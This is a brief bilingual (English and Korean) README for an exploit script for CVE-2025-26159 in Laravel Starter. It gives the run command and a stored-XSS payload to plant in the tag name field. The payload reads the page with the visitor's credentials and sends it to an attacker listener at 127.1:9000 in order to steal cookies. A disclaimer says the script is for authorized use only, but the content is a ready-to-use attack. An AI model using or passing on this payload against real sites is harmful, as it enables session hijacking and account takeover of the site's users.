
This script decodes, filters, and extracts cookies as part of the exploitation of CVE-2025-26159.
이 스크립트는 명시적 허가를 받은 승인된 환경에서만 사용해야 합니다. 저자는 이 스크립트 사용으로 인한 오용, 손해 또는 결과에 대해 책임을 지지 않습니다.
이 스크립트는 CVE-2025-26159의 익스플로잇 과정에서 쿠키를 디코딩, 필터링 및 추출합니다.
익스플로잇 단계를 이해하려면 제 블로그의 이 게시글을 확인하세요.
go run CVE-2025-26159.go
Laravel Starter의 태그 이름 필드에 다음 페이로드를 추가하세요:
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
사용자가 악성 태그의 상세 페이지를 방문하면 해당 사용자의 쿠키를 획득할 수 있습니다.